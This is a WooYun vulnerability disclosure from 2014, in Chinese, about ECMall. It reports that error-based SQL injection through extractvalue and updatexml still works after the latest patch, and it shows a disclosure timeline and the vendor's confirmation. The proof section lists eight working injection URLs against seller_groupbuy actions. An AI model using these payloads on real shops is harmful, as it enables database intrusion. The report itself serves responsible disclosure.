漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-07-09: 细节已通知厂商并且等待厂商处理中
2014-07-09: 厂商已经确认,细节仅向厂商公开
2014-07-12: 细节向第三方安全合作伙伴开放
2014-09-02: 细节向核心白帽子及相关领域专家公开
2014-09-12: 细节向普通白帽子公开
2014-09-22: 细节向实习白帽子公开
2014-10-07: 细节向公众公开
简要描述:
打了最新补丁,还可以绕过
详细说明:
还有两个函数可以绕过防护直接注入:
1.updatexml
2.extractvalue
所以以前出现的注入点用着两个函数就能再次注入
漏洞证明:
第一批url(店铺开启团购功能):
URL1:
http://localhost/ecmal/upload/index.php?app=seller_groupbuy&act=drop&id=2/**/and/**/extractvalue(1,concat(0x7e,user()))#
效果:
URL2:
http://localhost/ecmal/upload/index.php?app=seller_groupbuy&act=edit&id=2/**/and/**/extractvalue(1,concat(0x7e,user()))#
URL3:
http://localhost/ecmal/upload/index.php?app=seller_groupbuy&act=start&id=2/**/and/**/extractvalue(1,concat(0x7e,user()))#
URL4:
http://localhost/ecmal/upload/index.php?app=seller_groupbuy&act=finished&id=2/**/and/**/extractvalue(1,concat(0x7e,user()))#
URL5:
http://localhost/ecmal/upload/index.php?app=seller_groupbuy&act=finished&id=2/**/and/**/extractvalue(1,concat(0x7e,user()))#
URL6:
http://localhost/ecmal/upload/index.php?app=seller_groupbuy&act=desc&id=2/**/and/**/extractvalue(1,concat(0x7e,user()))#
URL7:
http://localhost/ecmal/upload/index.php?app=seller_groupbuy&act=cancel&id=2/**/and/**/extractvalue(1,concat(0x7e,user()))#
URL8:
http://localhost/ecmal/upload/index.php?app=seller_groupbuy&act=log&id=2/**/and/**/extractvalue(1,concat(0x7e,user()))#
第二批url(开启feed功能,忘记在哪儿开启的了,参照http://wooyun.org/bugs/wooyun-2014-065340):
http://localhost/ecmall/index.php?app=member&act=feed_settings
payload:
... ...之前爆过的都可以,以上面这些url为例。
修复方案:
过滤concat等危险字符
版权声明:转载请注明来源 HackBraid@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2014-07-09 11:24
厂商回复:
非常感谢您为shopex信息安全做的贡献
我们将尽快处理
谢谢
最新状态:
暂无